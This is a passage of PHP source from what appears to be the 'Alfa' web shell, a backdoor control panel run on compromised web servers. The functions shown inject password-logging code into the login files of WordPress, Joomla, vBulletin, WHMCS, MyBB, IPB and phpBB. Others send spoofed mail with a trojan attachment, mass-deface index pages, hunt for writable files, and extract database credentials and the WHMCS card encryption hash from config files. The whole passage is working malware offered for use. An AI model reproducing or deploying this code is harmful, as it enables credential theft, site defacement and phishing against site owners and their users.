'; echo "[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."
"; echo "[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."
"; echo "[~] Searching for passwords in config files...\n\n"."


"; foreach($users as $user){ if(empty($user))continue; $path = str_replace("{user}", $user, $makepwd); echo "
Change Dir ..:: $user ::..

"; } }else{echo('
[-] Error : coudn`t read /etc/passwd [-]
');} echo '

'; echo '
'; alfafooter(); } function alfamail(){ alfahead(); echo '
'; AlfaNum(8,9,10); echo '

| Fake Mail |

'; $table = array( 'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60') ); create_table($table); echo '

Message:

'; if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){ $mail_to = $_POST['alfa1']; $mail_from = $_POST['alfa2']; $mail_subject = $_POST['alfa3']; $mail_content = $_POST['alfa5']; $count_mail = (int)$_POST['alfa6']; $mail_attach = $_POST['alfa7']; if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){ if(!empty($mail_attach)&&@is_file($mail_attach)){ $file = $mail_attach; $content = __read_file($file); $content = chunk_split(__ZW5jb2Rlcg($content)); $uid = md5(uniqid(time())); $filename = basename($file); $headers = "From: ".$mail_from." <".$mail_from.">\r\n"; $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n"; $headers .= "Reply-To: ".$mail_from."\r\n"; $headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n"; $headers .= 'MIME-Version: 1.0' . "\r\n"; $headers .= 'X-Mailer: php' . "\r\n"; $mail_content = "--".$uid."\r\n"; $mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n"; $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n"; $mail_content .= $mail_content."\r\n\r\n"; $mail_content .= "--".$uid."\r\n"; $mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n"; $mail_content .= "Content-Transfer-Encoding: base64\r\n"; $mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n"; $mail_content .= $content."\r\n\r\n"; $mail_content .= "--".$uid."--"; }else{ $headers = "From: " . $mail_from. " ( ".$mail_from." ) \r\n"; $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n"; $headers .= 'Reply-To: '.$mail_from.'' . "\r\n"; $headers .= 'Content-type: text/html; charset=utf-8' . "\r\n"; $headers .= 'MIME-Version: 1.0' . "\r\n"; $headers .= 'X-Mailer: php' . "\r\n"; } if(empty($count_mail)||$count_mail<1)$count_mail=1; if(!empty($mail_from)){echo __pre(); for($i=1;$i<=$count_mail;$i++){ if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("
Sent -> $mail_to
"); }}else{__alert("Invalid Mail From !");} }else{__alert("Invalid Mail To !");} } echo('
'); alfafooter(); } function alfaziper(){ alfahead(); AlfaNum(8,9,10); echo '

| Compressor |

Dir/File:
Save Dir:

'; if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){ $dirzip = $_POST['alfa3']; $zipfile = $_POST['alfa4']; if (class_exists('ZipArchive')&&($GLOBALS['sys']!='unix'||!_alfa_can_runCommand(true,true))){ $code='if(!extension_loaded(\'zip\')||!file_exists($source)){return false;}$zip=new ZipArchive();if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;}$source=str_replace(\'\\\\\',\'/\',realpath($source));if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);foreach($files as $file){$file=str_replace(\'\\\\\',\'/\',$file);if(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;$file=realpath($file);if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));}else if(is_file($file)===true){$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));}}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));}return $zip->close();'; $newfunc = create_function('$source,$destination', $code); if($newfunc($dirzip, $zipfile)){ echo __pre().'

Success...!
'.$zipfile.'

'; }else{echo __pre().'

ERROR!!!...

';} }else{ alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."' > /dev/null &"); echo __pre().'

Please Wait For 1 minutes AND Check this -> '.$zipfile.'
Because We Executed The Command in The background !

'; }} echo '
'; alfafooter(); } function alfacmshijacker(){ alfahead(); AlfaNum(5,6,7,8,9,10); echo '

| Cms Hijacker |


CMS: "); echo ' Path installed cms: SaveTo:

'; $cms = $_POST['alfa1']; $saveto = $_POST['alfa2']; $cmspath = $_POST['alfa4']; if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){ echo __pre(); alfaHijackCms($cms,$cmspath,$saveto); } echo '
'; alfafooter(); } function alfaHijackCms($cms,$cmspath,$saveto){ switch($cms){ case "vb": hijackvBulletin($cmspath,$saveto); break; case "wp": hijackwp($cmspath,$saveto); break; case "jom": hijackJoomla($cmspath,$saveto); break; case "whmcs": hijackWhmcs($cmspath,$saveto); break; case "mybb": hijackMybb($cmspath,$saveto); break; case "ipb": hijackIPB($cmspath,$saveto); break; case "phpbb": hijackPHPBB($cmspath,$saveto); break; default: echo "error!"; break; } } function hijackvBulletin($path,$saveto){ $code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}'; $clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')'; $code=str_replace('{saveto_path}',$saveto,$code); $login = $path."/login.php"; $class = $path."/includes/class_bootstrap.php"; $dologin = 'do_login_redirect();'; $evil_login = "\t".$code."\n\t".$dologin; $evil_class = "true"; if(@is_file($login) AND @is_writable($login) AND @is_file($class) AND @is_writable($class)){ $data_login = @file_get_contents($login); $data_class = @file_get_contents($class); if(strstr($data_login, $dologin) AND strstr($data_class, $clearpw)){ $login_replace = str_replace($dologin,$evil_login, $data_login); $class_replace = str_replace($clearpw,$evil_class, $data_class); @file_put_contents($login, $login_replace); @file_put_contents($class, $class_replace); hijackOutput(0,$saveto); }else{ hijackOutput(1); } }else{ hijackOutput(1); } } function hijackwp($path,$saveto){ $code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);'; $redirect_wp = 'if ( !is_wp_error($user) && !$reauth ) {'; $code=str_replace('{saveto_path}',$saveto,$code); $login=$path."/wp-login.php"; $evil_login = "\t".$redirect_wp."\n\t".$code; if(@is_file($login) AND @is_writable($login)){ $data_login = @file_get_contents($login); if(strstr($data_login, $redirect_wp)){ $login_replace = str_replace($redirect_wp,$evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0,$saveto); }else{ hijackOutput(1); } }else{ hijackOutput(1); } } function hijackJoomla($path,$saveto){ $code = '$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>'; $code=str_replace('{saveto_path}',$saveto,$code); $comp=$path."/administrator/components/com_login/"; if(@is_file($comp."/login.php")){ $login = $comp."/login.php"; }elseif(@is_file($comp."/admin.login.php")){ $login = $comp."/admin.login.php"; }else{ $login = ''; } if(@is_file($login) AND @is_writable($login) AND $login != ''){ $data_login = @file_get_contents($login); $evil_login = $code."\n".$data_login; @file_put_contents($login, $evil_login); hijackOutput(0,$saveto); }else{ hijackOutput(1); } } function hijackWhmcs($path,$saveto){ $code = ' 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>'; $code=str_replace('{saveto_path}',$saveto,$code); $conf=$path."/configuration.php"; if(@is_file($conf) AND @is_writable($conf)){ $data_conf = @file_get_contents($conf); if(!strstr($data_conf,'?>'))$code = '?>'.$code; $evil_conf = $data_conf."\n".$code; @file_put_contents($conf, $evil_conf); hijackOutput(0,$saveto); }else{ hijackOutput(1); } } function hijackMybb($path,$saveto){ $code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);'; $find = '$loginhandler->complete_login();'; $code=str_replace('{saveto_path}',$saveto,$code); $login=$path."/member.php"; $evil_login = "\t".$code."\n\t".$find; if(@is_file($login) AND @is_writable($login)){ $data_login = @file_get_contents($login); if(strstr($data_login, $find)){ $login_replace = str_replace($find,$evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0,$saveto); }else{ hijackOutput(1); } }else{ hijackOutput(1); } } function hijackIPB($path,$saveto){ $code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);'; $find = 'unset( $member[\'plainPassword\'] );'; $code=str_replace('{saveto_path}',$saveto,$code); $login=$path."/admin/sources/handlers/han_login.php"; $evil_login = "\t".$find."\n\t".$code; if(@is_file($login) AND @is_writable($login)){ $data_login = @file_get_contents($login); if(strstr($data_login, $find)){ $login_replace = str_replace($find,$evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0,$saveto); }else{ hijackOutput(1); } }else{ hijackOutput(1); } } function hijackPHPBB($path,$saveto){ $code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}'; $find = 'case \'login\':'; $code=str_replace('{saveto_path}',$saveto,$code); $login=$path."/ucp.php"; $evil_login = "\t".$find."\n\t".$code; if(@is_file($login) AND @is_writable($login)){ $data_login = @file_get_contents($login); if(strstr($data_login, $find)){ $login_replace = str_replace($find,$evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0,$saveto); }else{ hijackOutput(1); } }else{ hijackOutput(1); } } function hijackOutput($c=0,$p=''){echo($c==0?"
Success --> path: $p
":'
Error in inject code !
');} function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){ if(@is_dir($dir)){ $files=@scandir($dir); foreach($files as $key => $value){ $path=@realpath($dir. DIRECTORY_SEPARATOR .$value); if(!@is_dir($path)){ if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;} if($e=='str'){ $content = @file_get_contents($path); if(strpos($content, $string) !== false){ echo str_replace('\\','/',$path) . "
"; } }else{ if(strstr($value,$string)){ echo str_replace('\\','/',$path) . "
"; } } $results[] = $path; }elseif($value != "." && $value != "..") { Alfa_StrSearcher($path,$string,$ext,$e,$results); $results[] = $path; }}}} function alfasearcher(){ alfahead(); echo '

| Searcher |

| Find Readable Or Writable Files | | Find Files By Name |

'; if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){ echo '
| Find Readable Or Writable Files |


Method: Dir: Ext: [ * = all Ext ]

'; $dir = $_POST['alfa2']; $ext = $_POST['alfa3']; $method = $_POST['alfa4']; if($_POST['alfa5']=='>>'){ echo __pre(); if(substr($dir,-1)=='/')$dir=substr($dir,0,-1); Alfa_Searcher($dir,trim($ext),$method); } } if($_POST['alfa1']=='str'){ echo '
| Find Files By Name / Find String In Files |


Method: String: Dir: Ext: [ * = all Ext ]

'; $dir = $_POST['alfa2']; $string = $_POST['alfa3']; $ext = $_POST['alfa5']; if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){ echo __pre(); Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']); } } echo '
'; alfafooter(); } function alfaMassDefacer(){ alfahead(); AlfaNum(5,6,7,8,9,10); echo "

| Mass Defacer |

>');return false;\" method='post'>"; echo '
Deface Method: Mass dir: DefPage:

'; $dir = $_POST['alfa1']; $defpage = $_POST['alfa2']; $method = $_POST['alfa3']; $fCurrent = $GLOBALS['__file_path']; if($_POST['alfa4'] == '>>'){ if(!empty($dir)){ if(@is_dir($dir)){ if(@is_readable($dir)){ if(@is_file($defpage)){ if($dh = @opendir($dir)){ echo __pre(); while (($file = @readdir($dh)) !== false){ if($file == '..' || $file == '.')continue; $newfile=$dir.$file; if($fCurrent == $newfile)continue; if(@is_dir($newfile)){ Alfa_ReadDir($newfile,$method,$defpage); }else{ if(!@is_writable($newfile))continue; if(!@is_readable($newfile))continue; Alfa_Rewriter($newfile,$file,$defpage,$method); } } closedir($dh); }else{__alert('Error In OpenDir...');} }else{__alert('DefPage File NotFound...');} }else{__alert('Directory is not Readable...');} }else{__alert('Mass Dir is Invalid Dir...');} }else{__alert('Dir is Empty...');} } echo '
'; alfafooter(); } function Alfa_ReadDir($dir,$method='',$defpage=''){ if(!@is_readable($dir)) return false; if (@is_dir($dir)) { if ($dh = @opendir($dir)) { while(($file=readdir($dh))!==false) { if($file == '..' || $file == '.')continue; $newfile=$dir.'/'.$file; if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage); if(@is_file($newfile)){ if(!@is_readable($newfile))continue; Alfa_Rewriter($newfile,$file,$defpage,$method); } } closedir($dh); } } } function Alfa_Rewriter($dir,$file,$defpage,$m='index'){ if(!@is_writable($dir)) return false; if(!@is_readable($dir)) return false; $defpage=@file_get_contents($defpage); if($m == 'index'){ $indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js'); if(in_array(strtolower($file),$indexs)){ @file_put_contents($dir,$defpage); echo @is_file($dir)?$dir."DeFaced...
" : ''; } }elseif($m=='all'){ @file_put_contents($dir,$defpage); echo @is_file($dir)?$dir." DeFaced...
" : ''; } } function alfaGetDisFunc(){ alfahead(); echo '
'; $disfun = @ini_get('disable_functions'); $s = explode(',',$disfun); $f = array_unique($s); echo '

Disable Functions
';
$i=1;
foreach($f as $s){
$s=trim($s);
if(function_exists($s)||!is_callable($s))continue;
echo '';
echo '';
$i++;
}
echo '
#Func Name
'.$i.''.$s.'
'; echo '
'; alfafooter(); } function Alfa_Create_A_Tag($action,$vals){ $nulls = array(); foreach($vals as $key => $val){ echo '| '.$key.' | '; unset($nulls); } } function Alfa_Searcher($dir, $ext, $method) { if(@is_readable($dir)){ if($method == 'all')$ext = '*'; if($method == 'dirs')$ext = '*'; $globFiles = @glob("$dir/*.$ext"); $globDirs = @glob("$dir/*", GLOB_ONLYDIR); $blacklist = array(); foreach ($globDirs as $dir) { if(!@is_readable($dir)) continue; @Alfa_Searcher($dir, $ext, $method); } switch($method){ case "files": foreach ($globFiles as $file){ if(@is_writable($file)){ echo "$file
"; } } break; case "dirs": foreach ($globFiles as $file){ if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){ echo dirname($file).'
'; $blacklist[] = dirname($file); } } break; case "all": foreach ($globFiles as $file){ echo $file.'
'; } break; } unset($blacklist); } } function AlfaiFrameCreator($f,$width='100%',$height='600px'){ return(''); } class AlfaCURL { public $headers; public $user_agent; public $compression; public $cookie_file; public $proxy; public $path; public $ssl = false; public $curl_status = true; function __construct($cookies=false,$compression='gzip',$proxy=''){ if(!extension_loaded('curl')){$curl_status = false;return false;} $this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg'; $this->headers[] = 'Connection: Keep-Alive'; $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8'; $this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)'; $this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt'; $this->compression=$compression; $this->proxy=$proxy; $this->cookies=$cookies; if($this->cookies)$this->cookie($this->path); } function cookie($cookie_file) { if (_alfa_file_exists($cookie_file,false)) { $this->cookie_file=$cookie_file; }else{ @fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.')); $this->cookie_file=$cookie_file; @fclose($this->cookie_file); } } function Send($url,$method="get",$data=""){ if(!$this->curl_status){return false;} $process = curl_init($url); curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers); curl_setopt($process, CURLOPT_HEADER, 0); curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent); curl_setopt($process, CURLOPT_RETURNTRANSFER, 1); curl_setopt($process, CURLOPT_ENCODING , $this->compression); curl_setopt($process, CURLOPT_TIMEOUT, 30); if($this->ssl){ curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false); curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false); } if($this->cookies){ curl_setopt($process, CURLOPT_COOKIEFILE, $this->path); curl_setopt($process, CURLOPT_COOKIEJAR, $this->path); } if($this->proxy){ curl_setopt($process, CURLOPT_PROXY, $this->proxy); } if($method=='post'){ curl_setopt($process, CURLOPT_POSTFIELDS, $data); curl_setopt($process, CURLOPT_POST, 1); curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded')); } $return = curl_exec($process); curl_close($process); return $return; } function error($error) { echo "
cURL Error
$error
"; die; } } function getConfigHtml($cms){ $content = ''; $cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF"); $content .= "
Cms:
Path(installed cms/Config):
"; $content .= "
"; return $content; } function alfaGetConfig(){ $cms = $_POST['alfa1']; $path = trim($_POST['alfa2']); $config = array( 'wp'=>array('file'=>'/wp-config.php', 'host'=>array("/define\('DB_HOST',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2), 'dbname'=>array("/define\('DB_NAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2), 'dbuser'=>array("/define\('DB_USER',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2), 'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2), 'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3) ), 'drupal'=>array('file'=>'/config.php', 'host'=>array("/define\('DB_HOSTNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2), 'dbname'=>array("/define\('DB_DATABASE',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2), 'dbuser'=>array("/define\('DB_USERNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2), 'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2), 'prefix'=>array("/define\('DB_PREFIX',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2) ), 'vb'=>array('file'=>'/includes/config.php', 'host'=>array("/config\['MasterServer'\]\['servername'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbuser'=>array("/config\['MasterServer'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbname'=>array("/config\['Database'\]\['dbname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbpw'=>array("/config\['MasterServer'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'prefix'=>array("/config\['Database'\]\['tableprefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3) ), 'phpnuke'=>array('file'=>'/config.php', 'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3), 'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3), 'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3), 'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3), 'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3) ), 'smf'=>array('file'=>'/Settings.php', 'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3) ), 'whmcs'=>array('file'=>'/configuration.php', 'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3) ), 'joomla'=>array('file'=>'/configuration.php', 'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3) ), 'phpbb'=>array('file'=>'/config.php', 'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3) ), 'mybb'=>array('file'=>'/inc/config.php', 'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3) ) ); $data = array(); $srch_host = $config[$cms]['host'][0]; $srch_user = $config[$cms]['dbuser'][0]; $srch_name = $config[$cms]['dbname'][0]; $srch_pw = $config[$cms]['dbpw'][0]; $prefix = $config[$cms]['prefix'][0]; $file = $config[$cms]['file']; $chost = $config[$cms]['host'][1]; $cuser = $config[$cms]['dbuser'][1]; $cname = $config[$cms]['dbname'][1]; $cpw = $config[$cms]['dbpw'][1]; $cprefix = $config[$cms]['prefix'][1]; if(@is_dir($path)||_alfa_is_dir($path)){ $file=$path.$file; }elseif(@is_file($path)||_alfa_is_dir($path,"-e")){ $file=$path; }else{ return false; } $file = __read_file($file); if(preg_match($srch_host, $file, $mach)){ $data['host'] = $mach[$chost]; } if(preg_match($srch_user, $file, $mach)){ $data['user'] = $mach[$cuser]; } if(preg_match($srch_name, $file, $mach)){ $data['dbname'] = $mach[$cname]; } if(preg_match($srch_pw, $file, $mach)){ $data['password'] = $mach[$cpw]; } if(isset($prefix)){ if(preg_match($prefix, $file, $mach)){ $data['prefix'] = $mach[$cprefix]; } } if($cms=='whmcs'){ if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){ $data['cc_encryption_hash'] = $mach[3]; } } echo json_encode($data); } if(empty($_POST['a'])) if(isset($default_action) && function_exists('alfa' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'FilesMan'; if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a'])) call_user_func('alfa' . $_POST['a']); exit; /* #z */